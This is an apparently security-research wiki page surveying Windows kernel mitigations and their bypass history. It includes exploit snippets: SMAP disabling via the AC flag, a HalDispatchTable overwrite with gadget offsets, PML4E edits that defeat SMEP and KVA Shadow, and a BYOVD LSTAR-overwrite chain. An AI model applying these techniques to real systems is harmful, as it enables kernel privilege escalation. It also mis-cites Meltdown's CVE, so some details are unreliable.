Kernel Mitigations
Last updated: 2026-04-11
Related: Mitigations, Primitives, Architecture, Rop
Tags:kernel-mode,smep,smap,kpp,hvci,cet,kcfg
Summary
Windows kernel mitigations form a layered defense that has, over the course of Win8→Win11, systematically closed off entire classes of exploitation technique. This page documents each mitigation: what it protects against, when it was introduced, and the bypass landscape.
SMEP (Supervisor Mode Execution Prevention)
Introduced: Intel Ivy Bridge (2012), enabled by Windows 8
Mechanism: CPU feature (bit 20 of CR4). Prevents ring 0 code from executing pages marked as user-mode (U/S=1 in page table).
Protects against: placing shellcode in user-mode memory and jumping to it from kernel
Bypass History
| Technique | Viability |
|---|---|
mov cr4, rax ; ret gadget to clear bit 20 | Patched by HVCI (intercepts CR4 writes) |
| Map shellcode as kernel page (via pool alloc) | Still viable without HVCI, requires AAW |
| ROP entirely in kernel space | Viable, doesn’t require SMEP bypass |
| Page-fault handler SMEP bypass (2013) | Patched |
Current status: Effective without HVCI. With HVCI, irrelevant — HVCI prevents unsigned kernel code execution regardless.
SMAP (Supervisor Mode Access Prevention)
Introduced: Intel Broadwell (2014), enabled by Windows 10 RS1
Mechanism: Prevents ring 0 from reading/writing user-mode pages (except within stac/clac bracketed regions).
Protects against: kernel code dereferencing user-supplied pointer without ProbeForRead/Write check
Note
SMAP is a defense-in-depth measure. Kernel code already should call ProbeForRead/ProbeForWrite. SMAP enforces this at hardware level — forgetting the probe causes a fault rather than a silent security bypass.
Bypass: Any code path within stac/clac region still has access. Also: bugs in interrupt/exception handling that run with SMAP disabled.
SMAP Bypass via RFLAGS AC Bit (User-Mode Settable)
A critical and underappreciated bypass: RFLAGS bit 18 (AC flag) controls SMAP and is writable from ring 3.
Setting the AC flag in RFLAGS before issuing a syscall causes SMAP to be disabled for the kernel-mode execution path that follows, because syscall preserves RFLAGS (it saves it to R11 but does not clear the AC bit on the way in). This means an attacker can disable SMAP entirely from user mode before triggering kernel execution:
; From user-mode, before executing syscall:
pushfq
pop rbx
or rbx, 0x40000 ; set bit 18 (AC flag) — disables SMAP
push rbx
popfq ; load modified RFLAGS
; Now execute syscall — kernel runs with SMAP disabled
This is exploited in LSTAR-overwrite attacks (WRMSR BYOVD class): even though the ROP chain consists of kernel-space gadgets, the user-mode stack (RSP) is still user-space after syscall entry. Without disabling SMAP first, the first ret in the ROP chain would fault accessing the user-space stack. Disabling SMAP via RFLAGS eliminates this constraint.
Note: sysret loads RFLAGS from R11 (saved by syscall). To avoid SMAP remaining disabled after returning to user-mode, the shellcode must restore R11 to the original RFLAGS before sysret.
Mitigation: SMAP bypass via AC flag is inherent to the architecture. The real mitigation is preventing the attacker from reaching kernel execution in the first place (i.e., preventing LSTAR overwrite).
KPP (Kernel Patch Protection / PatchGuard)
Introduced: Windows XP x64 SP1, Windows Vista 64-bit
Mechanism: Periodic integrity checks of critical kernel structures: SSDT, IDT, GDT, MSRS (LSTAR, SYSENTER), kernel code pages, object type tables
Protects against: kernel rootkit techniques — hooking SSDT, patching kernel code, replacing IDT entries
How It Works
- Multiple encrypted check routines dispersed throughout kernel
- Runs on random DPC timer (every 5-10 minutes nominally, variable)
- Detection →
KeBugCheckEx(0x109, CRITICAL_STRUCTURE_CORRUPTION)
Bypass Techniques (Historical)
- Patch the patcher: find and NOP out the bugcheck call — requires kernel code write, detected by self-integrity
- Race the check: make change, restore before check runs — timing unreliable
- DPC storm: flood system with DPCs to delay/prevent KPP timer — noisy
- PatchGuard bypass via VT-x: hypervisor intercepts and hides modifications — used by advanced rootkits
- Object Callbacks / Filesystem Minifilters: legitimate kernel extension points that KPP doesn’t check
Current status: Effective against casual hooking. Bypassable with hypervisor-level access. Irrelevant for exploit payloads that use data-only attacks (token steal doesn’t hook anything).
HVCI (Hypervisor-Protected Code Integrity)
Introduced: Windows 10 RS1 (opt-in), Windows 11 (default on supported hardware)
Mechanism: Uses VBS (Virtualization-Based Security) to protect memory page permissions. The secure kernel (running at a higher privilege level than NT kernel) owns the page tables — NT kernel cannot change a page from NX to executable or from read-only to writable.
What HVCI Prevents
- Loading unsigned kernel drivers
- Self-modifying kernel code
- Executing shellcode injected into kernel pool
- Disabling SMEP/SMAP via CR4/CR0 modification
- Disabling WP (Write Protect) bit in CR0 to write to read-only kernel pages
- Writing to kernel code sections (PatchGuard bypass via CR0.WP)
What HVCI Does NOT Prevent
- Data-only exploits (token swap, privilege bits)
- Ring 0 code execution via vulnerable signed driver (BYOVD — Bring Your Own Vulnerable Driver)
- Exploiting bugs within the signed code that already executes
BYOVD (Bring Your Own Vulnerable Driver)
- Load a legitimate but vulnerable signed driver
- Use its vulnerabilities as exploitation primitive
- Examples:
gdrv.sys(Gigabyte),mhyprot2.sys(MiHoYo),AsrDrv104.sys(ASRock) - Microsoft has a blocklist (WDAC policy) — keep it current, bypass via older versions
- Defense: Block driver loading via WDAC, keep Windows updated for blocklist updates
BYOVD Vulnerability Class: Unrestricted WRMSR
A particularly dangerous BYOVD pattern: drivers that expose an IOCTL calling wrmsr without access control or input validation. Drivers for hardware monitoring, overclocking, and diagnostic tools commonly use wrmsr/rdmsr for legitimate purposes but fail to restrict who can call the IOCTL.
Driver pattern (vulnerable):
// DriverEntry: IoCreateDevice instead of IoCreateDeviceSecure → any user can open device
// IOCTL handler calls wrmsr with user-supplied index and value:
typedef struct {
DWORD Affinity; // CPU affinity mask for KeSetSystemAffinityThreadEx
DWORD MsrIndex; // target MSR (e.g., 0xC0000082 = LSTAR)
DWORD64 Value; // value to write
} WRMSR_INPUT;
Exploitation: Point LSTAR (0xC0000082) at attacker shellcode. On next syscall, CPU switches to ring 0 and jumps to attacker address. Full chain:
- Set process/thread priority to Highest — minimize context switches during exploit window
- Pin thread to one CPU core via affinity (LSTAR is core-scoped, shared among threads on same physical core)
- Disable SMAP: set RFLAGS AC bit (bit 18) from user mode before the
syscallcall - Construct ROP stack; trigger
syscall(directly, not via Windows API) → jumps to LSTAR - First ROP gadget:
swapgs; iretq— switches GS to KPCR, restores kernel context via IRETQ frame - Second ROP gadget:
mov cr4, rax; ...— disables SMEP (CR4 bit 20/21 cleared) - Jump to shellcode: restore LSTAR immediately, token steal, restore CR4, return via
swapgs; sysret
Notable examples: HP Omen Gaming Hub (CVE-2021-3437 — SentinelOne), various chipset/OC utilities
LSTAR is monitored by KPP: must restore original LSTAR value in shellcode before KPP fires. Restore order: LSTAR first (immediately on shellcode entry, before any other syscall on same core fires), then payload, then CR4 restore.
Defeating HVCI (Research-Level)
- Exploit the secure kernel itself (Hyper-V / VTL1) — highest privilege target
- Exploit firmware/UEFI to modify VBS setup before it initializes
- Find TOCTOU in secure kernel page permission enforcement
CFG (Control Flow Guard)
Introduced: Windows 8.1 Update 3 / Windows 10 (user-mode); extended to kernel (kCFG) in Win10 RS1
Mechanism: Compiler-generated bitmap of valid indirect call targets. Before every indirect call/jmp, generated code checks the target against the bitmap. Invalid target → process termination.
User-Mode CFG
- Enabled per-module via linker flag
/guard:cf - Checks via
ntdll!LdrpValidateUserCallTarget→ lookup in_CFG_CALL_TARGET_INFObitmap - Bitmap stored in PE header region, per-module
kCFG (Kernel CFG)
- Similar principle for kernel indirect calls
- Enabled in ntoskrnl and system DLLs
- Without HVCI: only “Kernel-mode Address Check” — verifies that the indirect call target is within kernel address range (top bit = 1). User-mode addresses are rejected.
- With HVCI: full kCFG — verifies target is a valid CFG-enumerated function entry point within the kernel
- Win32k syscall filter + kCFG significantly limits kernel vtable-based exploitation
CFG Bypasses
| Technique | Notes |
|---|---|
| Write to bitmap itself (if AAW before CFG check) | Requires write before dispatch |
| Call a valid CFG target that has exploitable semantics | “CFG-compliant” ROP — find valid target that enables further control |
| JIT-compiled pages / ACG interaction | JIT engines need exception; browsers use ACG to prevent |
| Modules loaded without CFG | Some system DLLs still not CFG-enabled; use their exports |
| SetProcessValidCallTargets API | Legitimate API to mark pages as valid CFG targets — abused by some exploits |
| Data-only attack via AAW kernel gadget | Route indirect call to a kernel function that performs a write; kCFG never evaluates a CFG-invalid target because no indirect call to attacker-controlled code occurs — the gadget itself is a valid CFG target. CVE-2024-21338 pattern. |
kCFG Bypass via Kernel ROP Gadget (without HVCI)
When only the “Kernel-mode Address Check” is enforced (no HVCI), pointing an overwritten function pointer at a kernel-space jmp <reg> gadget passes the check while redirecting execution to a user-controlled register. The register must hold the shellcode address loaded beforehand from user mode.
Standard technique — HalDispatchTable+0x8 overwrite:
HalDispatchTable+0x8normally holds a pointer toHaliQuerySystemInformationNtQueryIntervalProfile(2, &dummy)triggers an indirect call throughHalDispatchTable+0x8- Overwrite
HalDispatchTable+0x8with address ofjmp r13gadget in ntoskrnl
// rp++ to find gadget: .\rp-win.exe -f ntoskrnl.exe -r 5 > ntoskrnl.txt
// 0x14080d5db: jmp r13 ; (1 found) → offset = 0x80d5db
// HalDispatchTable+0x8 offset from kernel base = 0xc00a68 (Win10 22H2; verify each build)
PVOID origHDT8 = ArbitraryRead(hDevice, (PVOID)(kernelBase + 0xc00a68));
PVOID jmpR13 = (PVOID)(kernelBase + 0x80d5db);
ArbitraryWrite(hDevice, (PVOID)(kernelBase + 0xc00a68), &jmpR13);
- Before triggering, store shellcode address in R13 using inline assembly stub:
; SetR13.asm (assembled to 4 bytes: 0x49 0x89 0xcd 0xc3)
SetR13:
mov r13, rcx ; Windows x64 ABI: 1st arg in RCX
ret
unsigned char rawSetR13[] = { 0x49, 0x89, 0xcd, 0xc3 };
PVOID execSetR13 = VirtualAlloc(NULL, 4, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(execSetR13, rawSetR13, 4);
((void(*)(PVOID))execSetR13)(shellcode); // R13 = shellcode address
R13–R15 and RSI survive from
NtQueryIntervalProfilethrough toHaliQuerySystemInformationwithout modification — confirmed via WinDbg register experiment (overwrite registers at NtQueryIntervalProfile breakpoint, observe at HaliQuerySystemInformation breakpoint).After shellcode returns, restore HalDispatchTable+0x8:
ArbitraryWrite(hDevice, (PVOID)(kernelBase + 0xc00a68), &origHDT8);
Note: Offsets 0xc00a68 (HalDispatchTable+0x8) and 0x80d5db (jmp r13) are Win10 22H2-specific. Use WinDbg or rp++ against the target build to find the correct values.
kCFG Bypass via Data-Only AAW Gadget (DbgkpTriageDumpRestoreState pattern)
When a vulnerability routes execution to an attacker-controlled kernel function pointer, but SMEP + kCFG block both user-mode and arbitrary kernel-address targets, the solution is to point the callback at a legitimate kernel function that performs a controlled write rather than jumping to attacker shellcode. kCFG validates the callback target (which is now a valid CFG-enumerated function) and SMEP is never triggered because the called code is kernel-space.
CVE-2024-21338 (appid.sys) example:
The IOCTL vulnerable to untrusted pointer dereference normally requires SeSetAccessStateGenericMapping (popular gadget for type-confusion exploits), but that function requires a first-argument struct ≥ 0x50 bytes while the IOCTL input is only 0x20. Searching for alternatives, nt!DbgkpTriageDumpRestoreState was found — it performs a write of the value at input+0x10 to *(input+0x00 + 0x2078):
Gadget: nt!DbgkpTriageDumpRestoreState
Offset from ntoskrnl base (Win11): 0x7f06e0
Effect: *(ImageContext + 0x2078) = CallbackTable
i.e., *(param1 + 0x2078) = *(input + 0x10)
This gives an 8-byte kernel AAW primitive from a single IOCTL trigger. The written value is controlled by the CallbackTable field — a VirtualAlloc-returned page-aligned pointer serves double duty: it is a valid non-null pointer (passes any non-null check in the kernel) and its value carries the desired write payload:
VirtualAlloc((VOID*)0x100000, ...)→ value =0x0000000000100000; low byte =0x00→ suitable for PreviousMode overwrite- Same value: bit 20 = 1 →
0x100000=SeDebugPrivilegebitmask → suitable for_SEP_TOKEN_PRIVILEGESoverwrite
See Cve 2024 21338 for the complete exploit chain.
CET (Control-flow Enforcement Technology)
Introduced: Intel Tiger Lake (2020); Windows 10 20H1 (user-mode opt-in); Windows 11 (broader enforcement)
Mechanism: Hardware shadow stack (SS). On call, CPU pushes return address to shadow stack (separate, read-only from ring 3). On ret, CPU compares popped return address against shadow stack — mismatch → #CP exception.
CET Shadow Stack (SS)
- Defeats: classic stack-based ROP chains by invalidating return-address overwrites
- Shadow stack pages: set in page table as shadow-stack pages — not writable by normal stores
- Shadow stack pointer in
IA32_PL3_SSPMSR
CET IBT (Indirect Branch Tracking)
- Every valid indirect call target must begin with
ENDBR64/ENDBR32instruction - CPU tracks “wait for ENDBR” state after indirect call/jmp
- Branching to non-ENDBR location →
#CPexception - Complements CFG at hardware level
CET Bypasses (Research)
- JOP (Jump-Oriented Programming): if IBT not enforced, jump chains without call/ret
- Shadow stack leak: if you can read shadow stack address, you can attempt targeted corruption (very hard, SS pages write-protected at hardware level)
- ENDBR gadgets: with IBT, “gadgets” must begin with ENDBR64 — limits but doesn’t eliminate ROP-equivalent chains
- longjmp/setjmp corruption:
setjmpsaves/restores shadow stack pointer — some implementations vulnerable - Exception handler manipulation:
__exceptblocks use shadow stack management — audit for manipulation opportunities
KVA Shadow (Kernel Virtual Address Shadow / KPTI)
Introduced: Windows 10 RS4 (1803), in response to Meltdown (CVE-2018-3620)
Mechanism: Dual PML4 tables. The “shadow” PML4 used in user mode has kernel pages mapped with the XD (Execute Disable) bit set and the U/S bit cleared, effectively making them non-executable and inaccessible from user mode. The full PML4 used in kernel mode has the normal mappings. A CR3 switch occurs on every syscall/interrupt boundary.
What KVA Shadow Adds on Top of SMEP
- SMEP prevents executing user-mode pages from ring 0 (U/S=1 pages blocked).
- KVA Shadow additionally prevents executing kernel-modified user pages from ring 0: even if you allocate a page with
VirtualAlloc(PAGE_EXECUTE_READWRITE), its PML4E in the kernel CR3 has XD=1 — the kernel cannot execute it, even after SMEP would otherwise allow it (since the page is user-mode). - Net effect: user-mode shellcode is not executable in kernel mode even when SMEP is defeated.
PML4 Self-Reference Entry Randomization (Win10 1607+)
A critical subtlety for bypass: the PML4 self-reference entry (the recursive PML4 entry that allows virtual address computation of page table entries) is at a random index (range 0x100–0x1FF) since Win10 1607. Previously it was fixed at 0x1ED.
This matters because calculating PTE virtual addresses requires knowing the self-reference index:
// PTE virtual address for any VA uses the self-ref index at bits 47:39
pte_addr = ((VA >> 9) & 0x7FFFFFFFF8) + pml4_self_ref_base;
The current self-reference base is stored at nt!MiGetPteAddress+0x13:
kd> dq nt!MiGetPteAddress+0x13 L1
fffff802`45c6b573 ffffec00`00000000 // self-ref base = 0xFFFFEC0000000000
Extract PML4 index from the leaked value:
unsigned int ExtractPml4Index(PVOID address) {
return ((uintptr_t)address >> 39) & 0x1ff; // bits 47:39
}
Offset of MiGetPteAddress+0x13 from kernel base: 0x26b573 (Win10 22H2 — always verify against target build with WinDbg).
KVA Shadow Bypass via PML4E Manipulation
The standard bypass on Win10 22H2 (without HVCI) uses an AAR/AAW primitive to directly modify the shellcode’s PML4 entry:
Step 1 — Leak self-ref entry (via AAR at kernelBase + 0x26b573):
PVOID pteBase = ArbitraryRead(hDevice, (PVOID)(kernelBase + MiGetPteAddress13_Offset));
unsigned int selfRefIndex = ExtractPml4Index(pteBase);
Step 2 — Calculate shellcode’s PML4E virtual address:
PVOID CalculatePml4VirtualAddress(unsigned int selfRefIndex, unsigned int pml4Index) {
uintptr_t addr = 0xffff;
addr = (addr << 9) | selfRefIndex; // PML4 index → self-ref
addr = (addr << 9) | selfRefIndex; // PDPT index
addr = (addr << 9) | selfRefIndex; // PDT index
addr = (addr << 9) | selfRefIndex; // PT index
addr = (addr << 0xC) | pml4Index * 8; // physical address offset
return (PVOID)addr;
}
unsigned int shellcodePml4Index = ExtractPml4Index(shellcode);
PVOID pml4EntryVA = CalculatePml4VirtualAddress(selfRefIndex, shellcodePml4Index);
Step 3 — Leak then modify PML4E (via AAR + AAW):
uintptr_t origEntry = (uintptr_t)ArbitraryRead(hDevice, pml4EntryVA);
uintptr_t modEntry = origEntry;
modEntry &= ~((uintptr_t)1 << 2); // Clear bit 2: U/S → kernel mode (defeats SMEP)
modEntry &= ~((uintptr_t)1 << 63); // Clear bit 63: XD=0 → executable (defeats KVA Shadow)
ArbitraryWrite(hDevice, pml4EntryVA, &modEntry);
After: !pte shows ---DA--KWEV instead of ---DA--UW-V — kernel mode (K) and executable (E).
Step 4 — Restore after shellcode execution (required to avoid KPP-triggered BSOD):
ArbitraryWrite(hDevice, pml4EntryVA, &origEntry);
KVASCODE Section (Trampoline Region)
KPTI requires a region of kernel code to be mapped in both the user-mode and kernel-mode page tables — the KVASCODE section. This section contains the syscall/interrupt entry stubs that must execute before the CR3 switch occurs (they run before the full kernel mapping is active).
Critical implications for exploitation:
- With KPTI active, ROP gadgets must be sourced from the KVASCODE section only until after the CR3 switch. Gadgets from the rest of ntoskrnl.exe are not mapped in the user-mode CR3 and will page-fault.
- After the CR3 swap (loading the full kernel
DirectoryTableBase), gadgets from the full ntoskrnl.exe and all loaded drivers become accessible. KiSystemCall64Shadowlives in KVASCODE. Its first instructions perform:swapgs, test KPTI flag, load kernel CR3 (if KPTI enabled), load kernel RSP, then jump into the middle ofKiSystemCall64.
KiSystemCall64Shadow Internals
syscall → RIP = LSTAR (→ KiSystemCall64Shadow, in KVASCODE)
swapgs ; swap IA32_GS_BASE (user TEB) ↔ IA32_KERNEL_GS_BASE (KPCR)
bt [KPTI flag] ; check if KVAS enabled for this process
mov cr3, DirectoryTableBase ; load kernel page table (if KPTI enabled)
mov rsp, KernelStack ; switch to kernel stack
→ jmp KiSystemServiceUser (inside KiSystemCall64)
Return path (KiKernelSysretExit):
mov rbp, UserDirectoryTableBase ; get user CR3
mov cr3, rbp ; restore user page table
; restore user RSP
swapgs ; restore user GS
sysret ; RIP = RCX (saved by syscall), RFLAGS = R11 (saved by syscall)
KPTI Disabled for Administrator Processes
An important behavioral detail: KPTI is disabled for processes running with administrative privileges. In _KPROCESS, UserDirectoryTableBase is set to 1 (invalid) and AddressPolicy = 1 when KPTI is disabled. This means:
- Admin-privilege exploits don’t need to bypass KPTI (kernel memory is already mapped in their CR3)
- ROP gadgets can be sourced from the entire ntoskrnl.exe, not just KVASCODE
- This significantly simplifies LSTAR-overwrite exploit development when starting from admin
KVA Shadow vs HVCI
If HVCI is active, the secure kernel owns the page tables and the NT kernel cannot modify PML4 entries — this bypass is blocked. PML4 modification requires HVCI to be absent.
Reference
- Source: ommadawn46, “Windows Kernel Exploitation: HEVD on Windows 10 22H2” (2024)
- GitHub: ommadawn46/HEVD-Exploit-Win10-22H2-KVAS
KASLR (Kernel Address Space Layout Randomization)
Introduced: Windows 8
Mechanism: Randomizes base address of kernel, HAL, and drivers at boot
Entropy: Initially weak (~8 bits = 256 slots). Improved in Win10+ with finer granularity.
Info Leak Mitigations (Win10+)
NtQuerySystemInformationrestricted for medium-IL and below for certain classes- GDI kernel pointer leaks patched systematically since RS1
NtGdiGetServerMetaFileBitsand similar patched- Token/handle address leaks in various APIs patched
Remaining Leak Surfaces (as of 2024)
NtQuerySystemInformation(SystemModuleInformation)— requiresSeDebugPrivilegeor elevated- Timing attacks (hardware-assisted)
- Bugs in new kernel features (graphics, virtualization, new drivers)
Safe Unlinking
Introduced: Windows 8
Mechanism: Pool free-list unlink validates Flink->Blink == current and Blink->Flink == current before unlink. Broken list = bug check.
Virtual Secure Mode (VBS)
Introduced: Windows 10 RS1 (optional); Windows 11 (default on compatible hardware)
Mechanism: Uses CPU virtualization to create a higher-privilege “secure world” (VTL1) that hosts the Secure Kernel and LSAISO. NT kernel runs in VTL0 and cannot access VTL1 memory.
VBS-Enabled Features
- HVCI: code integrity enforcement
- Credential Guard: LSASS isolation in VTL1
- WDAG (Windows Defender Application Guard): browser in VM
- Secured-core PC features
Mitigation Coverage Summary
| Attack | Win7 | Win8/8.1 | Win10 RS1 | Win10 1803+ | Win10 20H2 | Win11 |
|---|---|---|---|---|---|---|
| User shellcode in kernel | SMEP (HW) | SMEP | SMEP+CFG | SMEP+KVA Shadow+CFG | SMEP+KVA Shadow+CFG+CET | SMEP+KVA Shadow+CFG+CET+HVCI |
| SSDT hooking | KPP | KPP | KPP+HVCI(opt) | KPP+HVCI(opt) | KPP+HVCI | KPP+HVCI |
| ROP chains | - | - | CFG | CFG | CFG+CET(opt) | CFG+CET |
| Pool header overwrite | - | Safe unlink | Safe unlink | Segment Heap | Segment Heap | Segment Heap |
| GDI info leaks | Full | Partial | Patched | Patched | Patched | Patched |
| Unsigned drivers | - | - | HVCI(opt) | HVCI(opt) | HVCI(opt) | HVCI(default) |
| Win32k from sandbox | Partial | Partial | Syscall filter | Syscall filter | Syscall filter | Syscall filter |
References
- “Kernel Mitigation Improvements in Windows 11” — Microsoft Security Blog
- “HVCI Deep Dive” — Alex Ionescu, Crowdstrike
- “CET Internals” — Alex Ionescu, Winsider Seminars
- “PatchGuard Internals” — Alex Ionescu (various conference talks)
- “Bypassing CFG” — Yuki Chen, Trend Micro
